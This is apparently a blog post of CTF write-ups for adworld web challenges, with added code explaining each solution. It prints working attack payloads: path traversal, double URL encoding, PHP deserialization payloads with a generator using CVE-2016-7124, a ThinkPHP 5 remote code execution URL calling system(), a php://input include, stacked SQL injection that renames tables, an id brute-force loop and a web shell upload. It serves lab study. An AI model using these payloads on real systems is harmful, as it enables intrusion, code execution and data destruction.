攻防世界 (adworld) Web Advanced Challenges


Web advanced section

baby_web

The hint points at the initial page index.php, but requesting it always redirects to 1.php. Open the browser devtools (F12), look at the request for index.php itself in the Network tab, and the flag is in its response headers (the redirect response is what carries it, so the body of 1.php is irrelevant).


warmup

The page opens with a single huaji emoji. The page source reveals source.php; auditing it leads to hint.php, which says the flag is in ffffllllaaaagggg. The check only looks at the part of `file` before the first `?` and then includes the whole value, so source.php?file=hint.php?../../../../../../ffffllllaaaagggg passes the whitelist and includes the flag file.
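The bypass above works because the whitelist check and the include see different strings. The following is an added example, not code from the writeup or the challenge: a Python model of that check, written on the assumption (reconstructed from the behaviour described, not from the page) that the `file` value is cut at the first `?` before being compared against a whitelist of `source.php` and `hint.php`, while the include receives the full value. The web root path is a constructed placeholder.

```python
import posixpath
from urllib.parse import unquote

# Whitelist of pages the check accepts (these two names come from the writeup).
WHITELIST = {"source.php", "hint.php"}


def passes_check(page: str) -> bool:
    """ASSUMED model of the challenge's check: the value is cut at the
    first '?' (tried raw and once URL-decoded) and the prefix is looked up
    in the whitelist.  Everything after the '?' is never inspected."""
    for candidate in (page, unquote(page)):
        prefix = candidate.split("?", 1)[0]
        if prefix in WHITELIST:
            return True
    return False


def included_path(page: str, webroot: str = "/var/www/html") -> str:
    """What include() actually opens: the full parameter joined to the web
    root.  PHP's include collapses '..' components lexically before opening
    the file, so the non-existent directory 'hint.php?' is simply stepped
    back out of; posixpath.normpath does the same lexical collapse."""
    return posixpath.normpath(posixpath.join(webroot, page))


def exploit_path(target_file: str, depth: int = 6) -> str:
    """Build the writeup's payload: a whitelisted name, a '?', enough '..'
    to climb to '/', then the target file."""
    return "hint.php?" + "../" * depth + target_file
```

`passes_check` accepts the payload because the prefix is `hint.php`, while `included_path` shows that the include resolves to `/ffffllllaaaagggg`; a plain traversal without the whitelisted prefix is rejected, which is why the `hint.php?` prefix is needed.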


Training-WWW-Robots

Nothing much to say: robots.txt lists fl0g.php, and that page has the flag.


php2

Read the source in index.phps, then request /index.php?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 (the string admin URL-encoded twice: PHP decodes it once when filling $_GET, the script's own urldecode() decodes it a second time, so the early `=== "admin"` rejection sees `%61%64%6d%69%6e` while the later comparison sees `admin`).
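Why a single layer of encoding is not enough, as an added example that is not part of the writeup: a Python model of the php2 endpoint, reconstructed from the behaviour described above (the first comparison happens after PHP's own decode, the second after the script's urldecode()); the exact messages returned are constructed placeholders.

```python
from urllib.parse import parse_qs, unquote


def url_encode_all(s: str) -> str:
    """Percent-encode every byte, letters included (urllib's quote() would
    leave 'admin' untouched because letters are unreserved)."""
    return "".join(f"%{b:02x}" for b in s.encode())


def double_encode(s: str) -> str:
    return url_encode_all(url_encode_all(s))


def php2_endpoint(raw_query: str) -> str:
    """ASSUMED model of the php2 index.phps logic, reconstructed from the
    writeup: PHP decodes the query string once while filling $_GET; the
    script rejects a literal 'admin', then urldecode()s the value again
    and compares a second time."""
    params = parse_qs(raw_query)          # first decode: done by PHP itself
    id_value = params.get("id", [""])[0]
    if id_value == "admin":
        return "not allowed!"
    if unquote(id_value) == "admin":      # second decode: done by the script
        return "flag"
    return "no"
```

A single-encoded `%61%64%6d%69%6e` is already `admin` by the time the script runs, so it is rejected just like the plain string; only the double-encoded form survives the first comparison and still decodes to `admin` for the second.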


unserialize3

The source shows an unserialize() call on user input, so serialize an instance of the class locally and adjust the result:

```php
<?php
// Class as given by the challenge. serialize() never calls __wakeup();
// only unserialize() does, so running this locally just prints the string.
class xctf{
    public $flag = '111';
    public function __wakeup(){
        exit('bad requests');
    }
}
$a = new xctf();     // the class has no constructor, so it takes no argument
echo serialize($a);
?>
```

This prints O:4:"xctf":1:{s:4:"flag";s:3:"111";}. Change the property count from 1 to 2, giving O:4:"xctf":2:{s:4:"flag";s:3:"111";}: when the declared count is larger than the real number of properties, affected PHP versions (CVE-2016-7124, before 5.6.25 and 7.0.10) skip __wakeup(), so the exit('bad requests') never runs. Submit that string to get the flag.


Web_php_unserialize

Run the challenge code locally to build the payload. The Demo class and the request handler below are the challenge's index.php; the payload-generation lines in the middle are what we add to produce the final string:

```php
<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

// --- payload generation (run locally) ---
$a = new Demo("fl4g.php");
$b = serialize($a);                       // O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
$b = str_replace('O:4', 'O:+4', $b);      // "+4" is still a valid length for unserialize() but does not match /[oc]:\d+:/i
$b = str_replace('":1:{', '":2:{', $b);   // count 2 > 1 real property: __wakeup() is skipped (CVE-2016-7124)
echo $b, "\n";
echo base64_encode($b), "\n";             // same as base64_encode('O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}')

// --- the challenge's own entry point ---
if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {
        @unserialize($var);
    }
} else {
    highlight_file("index.php");
}
?>
```

Serialize first. The private property is stored as \0Demo\0file (the two NUL bytes count towards the length 10; they are shown as %00 here), the property count is raised from 1 to 2 so __wakeup() is skipped and cannot reset file back to index.php, and the class-name length is written as +4 so preg_match('/[oc]:\d+:/i') fails: O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.php";}. URL-decode the %00 in Burp, base64-encode the result, TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==, and submit it as ?var= to get the flag.
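Both unserialize3 and Web_php_unserialize rely on the same two edits to a serialized object, and this challenge adds the private-property encoding and the regex bypass. The following is an added example, not code from the writeup: a small Python generator that reproduces PHP's serialize() format for string properties, applies the property-count and `+` tricks, and rebuilds both payloads above from scratch (the xctf string and the base64 the writeup submits). The visibility encodings and the version range for CVE-2016-7124 are PHP behaviour; the helper names are this example's own.

```python
import base64
import re

BLOCKLIST = re.compile(r"[oc]:\d+:", re.I)   # the challenge's preg_match


def php_serialize_string(s: str) -> str:
    # PHP counts bytes; the NUL bytes in a private property name count too
    return f's:{len(s.encode())}:"{s}";'


def php_serialize_object(class_name: str, props, declared_count=None) -> str:
    r"""props: list of (visibility, name, str value).  Mirrors what PHP's
    serialize() emits: private names are stored as "\0Class\0name",
    protected as "\0*\0name", public as the bare name.  declared_count
    lets the caller state a property count that differs from the real one."""
    body = ""
    for visibility, name, value in props:
        if visibility == "private":
            key = f"\0{class_name}\0{name}"
        elif visibility == "protected":
            key = f"\0*\0{name}"
        else:
            key = name
        body += php_serialize_string(key) + php_serialize_string(value)
    n = len(props) if declared_count is None else declared_count
    return f'O:{len(class_name)}:"{class_name}":{n}:{{{body}}}'


def skip_wakeup(payload: str) -> str:
    """CVE-2016-7124: when the declared property count exceeds the real
    number, affected PHP versions (< 5.6.25, < 7.0.10) do not call
    __wakeup().  Bumps the count in the object header by one."""
    header, rest = payload.split(":{", 1)        # header is e.g. 'O:4:"xctf":1'
    prefix, count = header.rsplit(":", 1)
    return f"{prefix}:{int(count) + 1}:{{{rest}"


def evade_regex(payload: str) -> str:
    r"""'O:+4:' is still accepted by unserialize(), but /[oc]:\d+:/i needs
    a digit right after the colon, so the '+' makes the match fail."""
    return payload.replace("O:", "O:+", 1)


def is_blocked(payload: str) -> bool:
    return BLOCKLIST.search(payload) is not None


def unserialize3_payload() -> str:
    # xctf has one public property flag='111'; declare 2 so __wakeup is skipped
    return skip_wakeup(php_serialize_object("xctf", [("public", "flag", "111")]))


def web_php_unserialize_payload() -> str:
    # Demo has one private property file; point it at fl4g.php, skip __wakeup
    # (which would reset it to index.php) and dodge the regex, then base64
    raw = php_serialize_object("Demo", [("private", "file", "fl4g.php")])
    return base64.b64encode(evade_regex(skip_wakeup(raw)).encode()).decode()
```

`skip_wakeup` splits on the first `:{`, which is the object header for these payloads; a string value that itself contains `:{` would need a stricter parse. The regex bypass only helps against this particular pattern: a filter anchored on `O:` followed by an optional sign, or one that rejects any object at all, would still catch the payload.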


php_rce

A ThinkPHP 5 remote code execution. The `s` routing parameter reaches the `invokefunction` method of `think\app`, which runs `call_user_func_array` on attacker-supplied values: `vars[0]` names the function (`system`) and `vars[1][]` its argument (`ls`).

Exploit:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

Replace `ls` with `cat` on the file the listing reveals to read the flag.


Web_php_include

The source shows an include of the `page` parameter with a filter that strips the literal string php://, so use a PHP stream wrapper with a different case: the filter is case-sensitive, but PHP matches wrapper names case-insensitively, so Php://input is left untouched and still opens php://input. Send the PHP code to execute in the POST body.

/?hello=xxxxx&page=Php://input
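The case trick above is a blocklist failure, so it is worth seeing the filter beside a version that does not have the problem. The following is an added example, not code from the writeup or the challenge: a Python model of the filter, on the assumption (reconstructed from the behaviour described, not from the page) that it repeatedly removes the literal `php://` and includes what remains, plus an allowlist-based replacement. The `ALLOWED_PAGES` set is a constructed placeholder.

```python
import re

ALLOWED_PAGES = {"index.php", "about.php"}   # constructed allowlist for the hardened version


def vulnerable_page_filter(page: str) -> str:
    """ASSUMED model of the challenge's filter: strip every literal 'php://'
    and include whatever is left.  The loop defeats nesting such as
    'pphp://hp://', but the comparison is case-sensitive."""
    while "php://" in page:
        page = page.replace("php://", "")
    return page


def wrapper_scheme(page: str):
    """The stream wrapper PHP would select.  Wrapper names are matched
    case-insensitively, so 'Php://input' opens php://input."""
    m = re.match(r"([a-z][a-z0-9.+-]*)://", page, re.I)
    return m.group(1).lower() if m else None


def hardened_page_filter(page: str):
    """Allowlist instead of a blocklist: only known page names, so no scheme,
    no traversal, no case games.  Returns None when the request is rejected."""
    return page if page in ALLOWED_PAGES else None
```

The vulnerable filter reduces `php://input` and even `pphp://hp://input` to `input`, yet passes `Php://input` through unchanged, and `wrapper_scheme` shows PHP would still treat it as the `php` wrapper. The allowlist version rejects anything that is not a known page name, which is the check a practitioner should ship.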


supersqli

Stacked queries are allowed, so enumerate with SHOW statements:

/?inject=1';show databases; --+
/?inject=1';show tables; --+

Two tables: 1919810931114514 and words.

/?inject=1';show columns from `words`; --+

words has the columns id and data; 1919810931114514 has a single column, flag.

Inferred application query:

select id,data from `words` where id='$id'

Since the application only ever reads from words, swap the tables so that its own query returns the flag: rename words away, rename 1919810931114514 to words, and rename its flag column to id so the query still finds the column it expects (MySQL's statement is RENAME TABLE, singular; varchar(100) must be at least as long as the flag or it will be truncated):

/?inject=1';rename table `words` to `haha`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);--+

Then make the WHERE clause always true so every row of the renamed table is printed:

/?inject=1' or 1 --+
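The whole rename sequence can be replayed against a local MySQL instance to see exactly what the server executes. This is an added example, not part of the writeup: the two tables and their rows are constructed, and the script assumes the application's query is `SELECT * FROM words WHERE id='...'` run with multi-statement support (the writeup infers `select id,data`; with that exact column list the final query would fail once `data` is gone, so `SELECT *` is the form that matches the observed result). It also assumes, as the reason for the rename trick, that the input filter rejects SELECT.

```sql
-- Constructed reproduction of the supersqli table-swap (MySQL).
CREATE TABLE `words` (`id` INT, `data` VARCHAR(20));
CREATE TABLE `1919810931114514` (`flag` VARCHAR(100));
INSERT INTO `words` VALUES (1, 'hello'), (2, 'world');
INSERT INTO `1919810931114514` VALUES ('flag{constructed_sample}');

-- inject=1';rename table `words` to `haha`;rename table `1919810931114514` to `words`;
--        alter table `words` change `flag` `id` varchar(100);--+
-- The first statement is the application's own query, closed by the injected quote;
-- the trailing "-- " comments out the original closing quote.
SELECT * FROM `words` WHERE id='1';
RENAME TABLE `words` TO `haha`;
RENAME TABLE `1919810931114514` TO `words`;
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100);
-- ';

-- inject=1' or 1 --+
-- The application's unchanged query now reads the renamed flag table and the
-- always-true WHERE returns every row, i.e. the flag.
SELECT * FROM `words` WHERE id='1' OR 1;

-- Verify nothing was lost: the original words rows still exist under the new name.
SELECT * FROM `haha`;
```

If the target's column type were shorter than the flag, the ALTER would truncate it silently; using the column's original type (or a generous length) avoids that. Renaming tables is destructive on a shared target, so on a real engagement prefer a prepared-statement or handler-based read that leaves the schema alone.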


ics-06

Brute-force the id parameter; the flag appears at id=2333.
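The enumeration above is a loop with a stop condition, which is easy to get wrong when typed ad hoc (off-by-one ranges, matching on the wrong marker). The following is an added example, not code from the writeup: a Python enumerator whose request function is injected, so the same loop runs offline against a constructed stand-in and, with the commented-in `requests` line, against a target. The URL and the flag text are placeholders.

```python
from typing import Callable, Optional


def enumerate_id(fetch: Callable[[int], str], start: int = 1, stop: int = 5000,
                 marker: str = "flag") -> Optional[int]:
    """Request id=start..stop in turn and return the first id whose response
    body contains `marker`, or None if none does.  `fetch` is injected so the
    loop can be tested offline and wrapped around requests.get for live use."""
    for candidate in range(start, stop + 1):
        if marker in fetch(candidate):
            return candidate
    return None


def fake_target(candidate: int) -> str:
    # constructed stand-in for the challenge page: only id 2333 shows a flag
    if candidate == 2333:
        return "<p>flag{constructed_sample}</p>"
    return "<p>nothing here</p>"


if __name__ == "__main__":
    # Live use (assumed URL, not from the writeup):
    # import requests
    # found = enumerate_id(lambda i: requests.get("http://target/index.php",
    #                                            params={"id": i}).text)
    print(enumerate_id(fake_target))
```

Matching on a marker rather than on "the page looks different" keeps the loop robust when ids that do not exist return an error page of varying length.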

NewsCenter

SQL injection: the parameter closes with a single quote and # is not filtered, so follow the standard procedure (close the quote, comment out the rest, read the table and column names, dump the data) to get the flag.

NaNNaNNaNNaN-Batman

Not written up yet; on to the next one.

upload1

File upload: upload a web shell, connect with 菜刀 (China Chopper); didn't bother grabbing the flag.


Author: Broken-year
License: unless stated otherwise, all posts on this blog are released under CC BY 4.0. Please credit Broken-year when reposting.